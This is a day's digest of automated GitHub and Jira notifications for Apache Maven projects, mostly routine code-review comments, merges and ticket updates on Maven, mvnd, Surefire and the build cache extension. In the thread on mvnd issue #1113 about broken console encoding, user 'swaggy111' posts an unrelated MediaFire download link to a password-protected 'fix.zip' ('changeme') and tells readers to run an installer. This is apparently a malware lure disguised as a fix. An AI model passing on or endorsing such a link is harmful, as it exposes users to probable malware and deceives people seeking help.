Re: [PR] [MNG-8214] Improve model velocity template to support subclasses [maven]

2024-08-26 Thread via GitHub
kwin commented on code in PR #1660: URL: https://github.com/apache/maven/pull/1660#discussion_r1730778218 ## src/mdo/model.vm: ## @@ -145,55 +145,39 @@ public class ${class.name} #end /** - * Constructor for this class, package protected. + * Constructor fo

[jira] [Commented] (MNG-8214) Allow extension of the model classes being generated with model.vm

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876603#comment-17876603 ] ASF GitHub Bot commented on MNG-8214: - kwin commented on code in PR #1660: URL: https:/

Re: [PR] Bump net.bytebuddy:byte-buddy from 1.14.19 to 1.15.0 [maven]

2024-08-26 Thread via GitHub
gnodet merged PR #1681: URL: https://github.com/apache/maven/pull/1681 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: issues-unsubscr...@maven.apache.o

Re: [PR] [MNG-8214] Improve model velocity template to support subclasses [maven]

2024-08-26 Thread via GitHub
gnodet commented on code in PR #1660: URL: https://github.com/apache/maven/pull/1660#discussion_r1730817966 ## src/mdo/model.vm: ## @@ -145,55 +145,39 @@ public class ${class.name} #end /** - * Constructor for this class, package protected. + * Constructor

[jira] [Commented] (MNG-8214) Allow extension of the model classes being generated with model.vm

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876609#comment-17876609 ] ASF GitHub Bot commented on MNG-8214: - gnodet commented on code in PR #1660: URL: https

Re: [PR] [MNG-8214] Improve model velocity template to support subclasses [maven]

2024-08-26 Thread via GitHub
kwin commented on code in PR #1660: URL: https://github.com/apache/maven/pull/1660#discussion_r1730881137 ## src/mdo/model.vm: ## @@ -145,55 +145,39 @@ public class ${class.name} #end /** - * Constructor for this class, package protected. + * Constructor fo

[jira] [Commented] (MNG-8214) Allow extension of the model classes being generated with model.vm

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876629#comment-17876629 ] ASF GitHub Bot commented on MNG-8214: - kwin commented on code in PR #1660: URL: https:/

[PR] [MNG-8181] Add IT for maven.repo.central variable [maven-integration-testing]

2024-08-26 Thread via GitHub
gnodet opened a new pull request, #350: URL: https://github.com/apache/maven-integration-testing/pull/350 IT for https://github.com/apache/maven/pull/1615 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL

Re: [PR] [MNG-8214] Improve model velocity template to support subclasses [maven]

2024-08-26 Thread via GitHub
gnodet commented on code in PR #1660: URL: https://github.com/apache/maven/pull/1660#discussion_r1731010876 ## src/mdo/model.vm: ## @@ -145,55 +145,39 @@ public class ${class.name} #end /** - * Constructor for this class, package protected. + * Constructor

[jira] [Commented] (MNG-8214) Allow extension of the model classes being generated with model.vm

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876655#comment-17876655 ] ASF GitHub Bot commented on MNG-8214: - gnodet commented on code in PR #1660: URL: https

Re: [PR] [MNG-8214] Improve model velocity template to support subclasses [maven]

2024-08-26 Thread via GitHub
gnodet commented on code in PR #1660: URL: https://github.com/apache/maven/pull/1660#discussion_r1731010876 ## src/mdo/model.vm: ## @@ -145,55 +145,39 @@ public class ${class.name} #end /** - * Constructor for this class, package protected. + * Constructor

[jira] [Commented] (MNG-8214) Allow extension of the model classes being generated with model.vm

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876657#comment-17876657 ] ASF GitHub Bot commented on MNG-8214: - gnodet commented on code in PR #1660: URL: https

[I] Cancel job on client TERM signal [maven-mvnd]

2024-08-26 Thread via GitHub
mbien opened a new issue, #1112: URL: https://github.com/apache/maven-mvnd/issues/1112 Hello! the client is cancelling jobs on `ctrl+c` which makes sense. However, it seems like it won't do anything on TERM signal. This makes it difficult for tools which treat mvn and mvnd the

Re: [I] Cancel job on client TERM signal [maven-mvnd]

2024-08-26 Thread via GitHub
cstamas commented on issue #1112: URL: https://github.com/apache/maven-mvnd/issues/1112#issuecomment-2309872224 @gnodet @ppalaga please chime in! -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to t

Re: [I] Cancel job on client TERM signal [maven-mvnd]

2024-08-26 Thread via GitHub
gnodet commented on issue #1112: URL: https://github.com/apache/maven-mvnd/issues/1112#issuecomment-2310061099 @mbien your proposal sounds legit to me. I must admit my GraalVM experience is mostly limited to `mvnd`, so I won't be able to help much on that side. -- This is an automated me

Re: [PR] Document that V4 mojo are supposed to be threadsafe [maven]

2024-08-26 Thread via GitHub
gnodet merged PR #1675: URL: https://github.com/apache/maven/pull/1675 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: issues-unsubscr...@maven.apache.o

Re: [PR] [MRESOLVER-598] Improve Javadoc on version ranges [maven-resolver]

2024-08-26 Thread via GitHub
kwin merged PR #558: URL: https://github.com/apache/maven-resolver/pull/558 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: issues-unsubscr...@maven.apa

[jira] [Commented] (MRESOLVER-598) Improve javadoc around version ranges

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MRESOLVER-598?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876724#comment-17876724 ] ASF GitHub Bot commented on MRESOLVER-598: -- kwin merged PR #558: URL: https:/

[jira] [Resolved] (MRESOLVER-598) Improve javadoc around version ranges

2024-08-26 Thread Konrad Windszus (Jira)
[ https://issues.apache.org/jira/browse/MRESOLVER-598?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Konrad Windszus resolved MRESOLVER-598. --- Fix Version/s: 2.0.2 Resolution: Fixed https://github.com/apache/maven-reso

[jira] [Updated] (MPLUGIN-530) Deprecate o.a.m.plugins.annotations.Component

2024-08-26 Thread Konrad Windszus (Jira)
[ https://issues.apache.org/jira/browse/MPLUGIN-530?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Konrad Windszus updated MPLUGIN-530: Fix Version/s: 3.15.0 (was: 3.14.0) > Deprecate o.a.m.plugins.annot

Re: [I] Cancel job on client TERM signal [maven-mvnd]

2024-08-26 Thread via GitHub
mbien commented on issue #1112: URL: https://github.com/apache/maven-mvnd/issues/1112#issuecomment-2310233268 thanks! I could reproduce it outside of mvnd and filed a bug upstream https://github.com/oracle/graal/issues/9568 -- This is an automated message from the Apache Git Service. To r

[I] encoding confusion in "Total concurrency" output [maven-mvnd]

2024-08-26 Thread via GitHub
Bananeweizen opened a new issue, #1113: URL: https://github.com/apache/maven-mvnd/issues/1113 I run Windows, with my terminal using code page 437 (which I believe is a default for Western European setups). I use Java 21 for all things Maven. The total concurrency output line looks broken fo

Re: [I] encoding confusion in "Total concurrency" output [maven-mvnd]

2024-08-26 Thread via GitHub
swaggy111 commented on issue #1113: URL: https://github.com/apache/maven-mvnd/issues/1113#issuecomment-2310302717 Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc." -- This is an automated message from the

Re: [PR] [MNG-8214] Improve model velocity template to support subclasses [maven]

2024-08-26 Thread via GitHub
kwin commented on code in PR #1660: URL: https://github.com/apache/maven/pull/1660#discussion_r1731437500 ## src/mdo/model.vm: ## @@ -145,55 +145,39 @@ public class ${class.name} #end /** - * Constructor for this class, package protected. + * Constructor fo

[jira] [Commented] (MNG-8214) Allow extension of the model classes being generated with model.vm

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876760#comment-17876760 ] ASF GitHub Bot commented on MNG-8214: - kwin commented on code in PR #1660: URL: https:/

Re: [PR] [SUREFIRE-2252] - Fix JUnit5 reporting when tests are executed in parallel [maven-surefire]

2024-08-26 Thread via GitHub
ArvindJoshi-okta commented on PR #772: URL: https://github.com/apache/maven-surefire/pull/772#issuecomment-2310537554 > There are test failures, please take a look. @michael-o Could you pls review now? All tests are passing. -- This is an automated message from the Apache Git Servi

[jira] [Commented] (SUREFIRE-2252) Failsafe xml for a test class has results from another class

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/SUREFIRE-2252?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876764#comment-17876764 ] ASF GitHub Bot commented on SUREFIRE-2252: -- ArvindJoshi-okta commented on PR

Re: [PR] [MNG-8181] Add IT for maven.repo.central variable [maven-integration-testing]

2024-08-26 Thread via GitHub
gnodet merged PR #350: URL: https://github.com/apache/maven-integration-testing/pull/350 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: issues-unsubscr

Re: [PR] [MNG-8181] Provide a variable for maven central repo url, backed by an environment variable [maven]

2024-08-26 Thread via GitHub
gnodet merged PR #1615: URL: https://github.com/apache/maven/pull/1615 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: issues-unsubscr...@maven.apache.o

[jira] [Commented] (MNG-8181) Provide an environment variable for Maven Central URL

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8181?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876775#comment-17876775 ] ASF GitHub Bot commented on MNG-8181: - gnodet merged PR #1615: URL: https://github.com/

[jira] [Closed] (MNG-8181) Provide an environment variable for Maven Central URL

2024-08-26 Thread Guillaume Nodet (Jira)
[ https://issues.apache.org/jira/browse/MNG-8181?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Guillaume Nodet closed MNG-8181. Fix Version/s: 4.0.0-beta-4 Assignee: Guillaume Nodet Resolution: Fixed > Provide an

Re: [PR] [MNG-8214] Improve model velocity template to support subclasses [maven]

2024-08-26 Thread via GitHub
gnodet commented on code in PR #1660: URL: https://github.com/apache/maven/pull/1660#discussion_r1731523749 ## src/mdo/model.vm: ## @@ -493,40 +482,15 @@ public class ${class.name} #end @Nonnull public ${class.name} build() { +// this method sh

[jira] [Commented] (MNG-8214) Allow extension of the model classes being generated with model.vm

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MNG-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876788#comment-17876788 ] ASF GitHub Bot commented on MNG-8214: - gnodet commented on code in PR #1660: URL: https

Re: [PR] [SUREFIRE-2172] StringUtils: yet more of them [maven-surefire]

2024-08-26 Thread via GitHub
elharo commented on code in PR #768: URL: https://github.com/apache/maven-surefire/pull/768#discussion_r1731624164 ## surefire-api/src/main/java/org/apache/maven/surefire/api/report/LegacyPojoStackTraceWriter.java: ## @@ -54,7 +52,7 @@ public String writeTraceToString() {

[jira] [Commented] (SUREFIRE-2172) StringUtils: yet more of them

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/SUREFIRE-2172?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876813#comment-17876813 ] ASF GitHub Bot commented on SUREFIRE-2172: -- elharo commented on code in PR #7

Re: [PR] New feature custom plugin configuration [maven]

2024-08-26 Thread via GitHub
gnodet closed pull request #1580: New feature custom plugin configuration URL: https://github.com/apache/maven/pull/1580 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsu

Re: [PR] New feature custom plugin configuration [maven]

2024-08-26 Thread via GitHub
gnodet commented on PR #1580: URL: https://github.com/apache/maven/pull/1580#issuecomment-2311105583 I really don't understand this PR. Profiles are already defined in the POM, and can already be activated using user properties... Closing this PR. @yuehcw please reopen if you want

Re: [PR] Add missing since [maven]

2024-08-26 Thread via GitHub
cstamas merged PR #1682: URL: https://github.com/apache/maven/pull/1682 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: issues-unsubscr...@maven.apache.

[jira] [Commented] (MNG-7983) Update to Slf4j 2.x

2024-08-26 Thread Matt Nelson (Jira)
[ https://issues.apache.org/jira/browse/MNG-7983?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876844#comment-17876844 ] Matt Nelson commented on MNG-7983: -- Is there going to be a 3.10.x? Having trouble finding

Re: [PR] [MBUILDCACHE-104] Allow multiple cache entries per checksum [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #175: URL: https://github.com/apache/maven-build-cache-extension/pull/175#discussion_r1732010466 ## src/main/java/org/apache/maven/buildcache/Zone.java: ## @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under

[jira] [Commented] (MBUILDCACHE-104) Allow multiple cache entries per checksum

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-104?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876873#comment-17876873 ] ASF GitHub Bot commented on MBUILDCACHE-104: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-104] Allow multiple cache entries per checksum [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on PR #175: URL: https://github.com/apache/maven-build-cache-extension/pull/175#issuecomment-2311413192 Can you please provide more details on the reasons behind this change? What specific situations or scenarios require introduction of these zones? Personally,

[jira] [Commented] (MBUILDCACHE-104) Allow multiple cache entries per checksum

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-104?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876875#comment-17876875 ] ASF GitHub Bot commented on MBUILDCACHE-104: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-105] Executing 'clean process-test-classes' then 'clean verify' leads to empty jars [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #176: URL: https://github.com/apache/maven-build-cache-extension/pull/176#discussion_r1732039886 ## src/main/java/org/apache/maven/buildcache/CacheControllerImpl.java: ## @@ -255,6 +255,11 @@ private CacheResult analyzeResult(CacheConte

[jira] [Commented] (MBUILDCACHE-105) Executing 'clean process-test-classes' then 'clean verify' leads to empty jars

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-105?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876885#comment-17876885 ] ASF GitHub Bot commented on MBUILDCACHE-105: AlexanderAshitkin commented

[jira] [Updated] (MBUILDCACHE-105) Executing 'clean process-test-classes' then 'clean verify' leads to empty jars

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-105?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated MBUILDCACHE-105: --- Labels: pull-request-available (was: ) > Executing 'clean process-test-classes'

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732041354 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -228,20 +232,35 @@ private CacheRestorationStatus

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876887#comment-17876887 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732057978 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -267,6 +286,12 @@ private CacheRestorationStatus

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876892#comment-17876892 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732057978 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -267,6 +286,12 @@ private CacheRestorationStatus

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876893#comment-17876893 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732041354 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -228,20 +232,35 @@ private CacheRestorationStatus

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876895#comment-17876895 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732057978 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -267,6 +286,12 @@ private CacheRestorationStatus

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876897#comment-17876897 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732057978 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -267,6 +286,12 @@ private CacheRestorationStatus

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732057978 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -267,6 +286,12 @@ private CacheRestorationStatus

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876898#comment-17876898 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876899#comment-17876899 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

Re: [PR] [MBUILDCACHE-103] Allow incremental restore in case of plugin parameter mismatch [maven-build-cache-extension]

2024-08-26 Thread via GitHub
AlexanderAshitkin commented on code in PR #177: URL: https://github.com/apache/maven-build-cache-extension/pull/177#discussion_r1732068731 ## src/main/java/org/apache/maven/buildcache/BuildCacheMojosExecutionStrategy.java: ## @@ -228,20 +232,35 @@ private CacheRestorationStatus

[jira] [Commented] (MBUILDCACHE-103) Allow incremental restore in case of plugin parameter mismatch

2024-08-26 Thread ASF GitHub Bot (Jira)
[ https://issues.apache.org/jira/browse/MBUILDCACHE-103?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17876900#comment-17876900 ] ASF GitHub Bot commented on MBUILDCACHE-103: AlexanderAshitkin commented

[jira] [Created] (MDEPLOY-323) Same Bug as described in MINSTALL-160

2024-08-26 Thread Jira
Claus Köll created MDEPLOY-323: -- Summary: Same Bug as described in MINSTALL-160 Key: MDEPLOY-323 URL: https://issues.apache.org/jira/browse/MDEPLOY-323 Project: Maven Deploy Plugin Issue Type: B